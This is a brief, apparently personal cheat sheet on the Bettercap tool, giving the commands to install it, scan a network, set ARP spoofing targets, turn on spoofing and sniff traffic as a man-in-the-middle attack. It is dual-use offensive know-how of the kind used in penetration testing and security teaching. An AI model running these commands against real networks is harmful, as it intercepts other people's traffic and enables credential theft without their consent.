Bettercap

Bettercap is a tool that can be used as a MITM attack on a network. This can apply to wifi or ethernet

Installing Bettercap – sudo apt install bettercap

Usage

sudo bettercap – This launches the bettercap app

net.probe on – this searches for everyone on the network and who is available for the attack

net.show – this lists all of the devices on the network

set arp.spoof.targets <IP ADDRESS> – arp spoofing will first send traffic to attacker machine. You will need the IP of the host device

arp.spoof on – This turns on arp spoofing

net.sniff on – this turns the sniffer on